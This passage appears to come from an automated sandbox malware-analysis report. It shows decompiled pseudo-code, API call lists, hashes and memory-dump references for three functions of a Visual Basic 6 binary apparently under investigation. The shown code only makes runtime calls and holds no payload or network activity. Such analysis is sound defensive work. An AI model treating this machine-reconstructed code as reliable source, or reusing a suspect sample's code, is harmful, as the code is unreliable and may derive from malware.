              • __vbaFreeStr.MSVBVM60(00411B08,00000000,00411B00,?,?,?,?,004016F6), ref: 00414C16
              • __vbaNew2.MSVBVM60(004119C8,004183D8,00411B08,00000000,00411B00,?,?,?,?,004016F6), ref: 00414C3A
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,0000001C,?,?,?,?,?,?,?,00411B08,00000000,00411B00), ref: 00414C7E
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B0C,00000064,?,?,?,?,?,?,?,00411B08,00000000,00411B00), ref: 00414CBB
              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00411B08,00000000,00411B00), ref: 00414CD4
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$CheckFreeHresult$#527#535ChkstkMoveNew2
              • String ID:
              • API String ID: 2200900967-0
              • Opcode ID: 170a987d8a80f7e5d686bb503b9eede9cc32288fc8043b084c03c4b21eb4a195
              • Instruction ID: c72bbc027739b856598e66149ae6460f27b81ccb2d82861770efd3a22a58a69b
              • Opcode Fuzzy Hash: 170a987d8a80f7e5d686bb503b9eede9cc32288fc8043b084c03c4b21eb4a195
              • Instruction Fuzzy Hash: B3313475D41208EFCB00EB95D985FEEBBB4AF08B05F10412AF401B72A0EB795980CB68
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00416A76, Relevance: 13.6, APIs: 9, Instructions: 71COMMON
              Download Yara Rule
              C-Code - Quality: 60%
              			E00416A76(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v40;
				signed int _v52;
				signed int _t27;
				signed int _t31;
				void* _t40;
				void* _t42;
				intOrPtr _t43;

				_t43 = _t42 - 0xc;
				 *[fs:0x0] = _t43;
				L004016F0();
				_v16 = _t43;
				_v12 = 0x401668;
				_v8 = 0;
				_t27 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x4016f6, _t40);
				_push(1);
				L004017A4();
				L00401882();
				_push(_t27);
				_push(0x411d54);
				L0040184C();
				asm("sbb eax, eax");
				_v40 =  ~( ~( ~_t27));
				L00401924();
				_t31 = _v40;
				if(_t31 == 0) {
					L004017C8();
					L0040193C();
					asm("fcomp qword [0x401548]");
					asm("fnstsw ax");
					asm("sahf");
					if(__eflags != 0) {
						L0040183A();
						_t31 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t31);
						asm("fclex");
						_v40 = _t31;
						__eflags = _v40;
						if(_v40 >= 0) {
							_t19 =  &_v52;
							 *_t19 = _v52 & 0x00000000;
							__eflags =  *_t19;
						} else {
							_push(0x64);
							_push(0x41046c);
							_push(_a4);
							_push(_v40);
							L00401906();
							_v52 = _t31;
						}
					}
					_v32 = 0x562c6b10;
					_v28 = 0x5afc;
				}
				asm("wait");
				_push(0x416b68);
				return _t31;
			}
















              0x00416a79
              0x00416a88
              0x00416a92
              0x00416a9a
              0x00416a9d
              0x00416aa4
              0x00416ab3
              0x00416ab6
              0x00416ab8
              0x00416ac2
              0x00416ac7
              0x00416ac8
              0x00416acd
              0x00416ad4
              0x00416ada
              0x00416ae1
              0x00416ae6
              0x00416aec
              0x00416af6
              0x00416afb
              0x00416b00
              0x00416b06
              0x00416b08
              0x00416b09
              0x00416b11
              0x00416b1f
              0x00416b22
              0x00416b24
              0x00416b27
              0x00416b2b
              0x00416b44
              0x00416b44
              0x00416b44
              0x00416b2d
              0x00416b2d
              0x00416b2f
              0x00416b34
              0x00416b37
              0x00416b3a
              0x00416b3f
              0x00416b3f
              0x00416b2b
              0x00416b48
              0x00416b4f
              0x00416b4f
              0x00416b56
              0x00416b57
              0x00000000

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416A92
              • #525.MSVBVM60(00000001,?,?,?,?,004016F6), ref: 00416AB8
              • __vbaStrMove.MSVBVM60(00000001,?,?,?,?,004016F6), ref: 00416AC2
              • __vbaStrCmp.MSVBVM60(00411D54,00000000,00000001,?,?,?,?,004016F6), ref: 00416ACD
              • __vbaFreeStr.MSVBVM60(00411D54,00000000,00000001,?,?,?,?,004016F6), ref: 00416AE1
              • __vbaFPInt.MSVBVM60(00411D54,00000000,00000001,?,?,?,?,004016F6), ref: 00416AF6
              • __vbaFpR8.MSVBVM60(00411D54,00000000,00000001,?,?,?,?,004016F6), ref: 00416AFB
              • __vbaFpI4.MSVBVM60(00411D54,00000000,00000001,?,?,?,?,004016F6), ref: 00416B11
              • __vbaHresultCheckObj.MSVBVM60(00000000,00401668,0041046C,00000064), ref: 00416B3A
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$#525CheckChkstkFreeHresultMove
              • String ID:
              • API String ID: 4043493740-0
              • Opcode ID: 036afc83b0d6c8d2bc865e6a6749a08a19803fa2ff1b53d63bc55c9d08e47577
              • Instruction ID: 8327beefa91201b40eb9786365751e9e471f8a995cb9c991dae3523e0108a675
              • Opcode Fuzzy Hash: 036afc83b0d6c8d2bc865e6a6749a08a19803fa2ff1b53d63bc55c9d08e47577
              • Instruction Fuzzy Hash: A7213C75940218ABCB00AFA5CD45BDE7BB4BF04B44F10416AF402BB1B1DB799984CB59
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00416296, Relevance: 10.6, APIs: 7, Instructions: 84COMMON
              Download Yara Rule
              C-Code - Quality: 65%
              			E00416296(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr _v72;
				intOrPtr* _v76;
				signed int _v80;
				signed int _v84;
				signed int _t55;
				signed int _t60;
				signed int _t61;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t72 = _t71 - 0xc;
				 *[fs:0x0] = _t72;
				L004016F0();
				_v16 = _t72;
				_v12 = 0x4015d8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x4016f6, _t69);
				if( *0x4183d8 != 0) {
					_v76 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4119c8);
					L004018C4();
					_v76 = 0x4183d8;
				}
				_v48 =  *_v76;
				_t55 =  *((intOrPtr*)( *_v48 + 0x14))(_v48,  &_v44);
				asm("fclex");
				_v52 = _t55;
				if(_v52 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4119b8);
					_push(_v48);
					_push(_v52);
					L00401906();
					_v80 = _t55;
				}
				_v56 = _v44;
				_t60 =  *((intOrPtr*)( *_v56 + 0xe8))(_v56,  &_v40);
				asm("fclex");
				_v60 = _t60;
				if(_v60 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x411b34);
					_push(_v56);
					_push(_v60);
					L00401906();
					_v84 = _t60;
				}
				_t61 = _v40;
				_v72 = _t61;
				_v40 = _v40 & 0x00000000;
				L00401882();
				L004018AC();
				_v36 = 0xe5db1d70;
				_v32 = 0x5b00;
				_push(0x4163c8);
				L00401924();
				return _t61;
			}

























              0x00416299
              0x004162a8
              0x004162b2
              0x004162ba
              0x004162bd
              0x004162c4
              0x004162d3
              0x004162dd
              0x004162f7
              0x004162df
              0x004162df
              0x004162e4
              0x004162e9
              0x004162ee
              0x004162ee
              0x00416303
              0x00416312
              0x00416315
              0x00416317
              0x0041631e
              0x00416337
              0x00416320
              0x00416320
              0x00416322
              0x00416327
              0x0041632a
              0x0041632d
              0x00416332
              0x00416332
              0x0041633e
              0x0041634d
              0x00416353
              0x00416355
              0x0041635c
              0x00416378
              0x0041635e
              0x0041635e
              0x00416363
              0x00416368
              0x0041636b
              0x0041636e
              0x00416373
              0x00416373
              0x0041637c
              0x0041637f
              0x00416382
              0x0041638c
              0x00416394
              0x00416399
              0x004163a0
              0x004163a7
              0x004163c2
              0x004163c7

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004162B2
              • __vbaNew2.MSVBVM60(004119C8,004183D8,?,?,?,?,004016F6), ref: 004162E9
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000014), ref: 0041632D
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B34,000000E8), ref: 0041636E
              • __vbaStrMove.MSVBVM60 ref: 0041638C
              • __vbaFreeObj.MSVBVM60 ref: 00416394
              • __vbaFreeStr.MSVBVM60(004163C8), ref: 004163C2
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$CheckFreeHresult$ChkstkMoveNew2
              • String ID:
              • API String ID: 1253681662-0
              • Opcode ID: d52a108a95cd52b9bd0ebd65075f2b110e789bd5346bdcda7ebc7506fbf2a2aa
              • Instruction ID: 04d548ed46177ea5947db62e761431e632a3c66eaee1dac4b516af457be8de0f
              • Opcode Fuzzy Hash: d52a108a95cd52b9bd0ebd65075f2b110e789bd5346bdcda7ebc7506fbf2a2aa
              • Instruction Fuzzy Hash: 7631E270D0020CAFCB00EF95C945BDEBBB1AF08715F10856AF415BA2A0D779A985DF58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00414AA5, Relevance: 10.6, APIs: 7, Instructions: 72COMMON
              Download Yara Rule
              C-Code - Quality: 56%
              			E00414AA5(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				void* _v28;
				long long _v36;
				signed int _v40;
				char* _v48;
				char _v56;
				intOrPtr* _v60;
				signed int _v64;
				signed int _v72;
				intOrPtr* _v76;
				signed int _v80;
				char* _t34;
				char* _t35;
				signed int _t41;
				intOrPtr _t52;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(0x3c);
				L004016F0();
				_v12 = _t52;
				_v8 = 0x4014a0;
				_v48 =  &_v24;
				_v56 = 0x6003;
				_t34 =  &_v56;
				_push(_t34);
				L0040185E();
				if(_t34 != 0xffff) {
					if( *0x4183d8 != 0) {
						_v76 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v76 = 0x4183d8;
					}
					_v60 =  *_v76;
					_t41 =  *((intOrPtr*)( *_v60 + 0x48))(_v60, 0x20,  &_v40);
					asm("fclex");
					_v64 = _t41;
					if(_v64 >= 0) {
						_v80 = _v80 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x4119b8);
						_push(_v60);
						_push(_v64);
						L00401906();
						_v80 = _t41;
					}
					_v72 = _v40;
					_v40 = _v40 & 0x00000000;
					L00401882();
				}
				_v36 =  *0x401498;
				asm("wait");
				_push(0x414b98);
				_t35 =  &_v24;
				_push(_t35);
				_push(0);
				L00401858();
				L00401924();
				return _t35;
			}




















              0x00414aaa
              0x00414ab5
              0x00414ab6
              0x00414abd
              0x00414ac0
              0x00414ac8
              0x00414acb
              0x00414ad5
              0x00414ad8
              0x00414adf
              0x00414ae2
              0x00414ae3
              0x00414aec
              0x00414af5
              0x00414b0f
              0x00414af7
              0x00414af7
              0x00414afc
              0x00414b01
              0x00414b06
              0x00414b06
              0x00414b1b
              0x00414b2c
              0x00414b2f
              0x00414b31
              0x00414b38
              0x00414b51
              0x00414b3a
              0x00414b3a
              0x00414b3c
              0x00414b41
              0x00414b44
              0x00414b47
              0x00414b4c
              0x00414b4c
              0x00414b58
              0x00414b5b
              0x00414b65
              0x00414b65
              0x00414b70
              0x00414b73
              0x00414b74
              0x00414b84
              0x00414b87
              0x00414b88
              0x00414b8a
              0x00414b92
              0x00414b97

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00414AC0
              • #556.MSVBVM60(00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414AE3
              • __vbaNew2.MSVBVM60(004119C8,004183D8,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414B01
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000048,?,?,?,?,00006003), ref: 00414B47
              • __vbaStrMove.MSVBVM60(?,?,?,?,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414B65
              • __vbaAryDestruct.MSVBVM60(00000000,?,00414B98,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414B8A
              • __vbaFreeStr.MSVBVM60(00000000,?,00414B98,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414B92
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$#556CheckChkstkDestructFreeHresultMoveNew2
              • String ID:
              • API String ID: 4055419735-0
              • Opcode ID: c25fdfa6418a97f14971e42554cf537ede212f11b8d2f109d25fa82e065b2e53
              • Instruction ID: 2be4f9b1cf2b04e52aba89f777a11a0a658b0057701f0d3ff0bc021a90d7cd84
              • Opcode Fuzzy Hash: c25fdfa6418a97f14971e42554cf537ede212f11b8d2f109d25fa82e065b2e53
              • Instruction Fuzzy Hash: 682137B0D40209EFDB00EF95D846BEEBBB4EF04705F60442AF100B72A0D7B96985CB19
              Uniqueness

              Uniqueness Score: -1.00%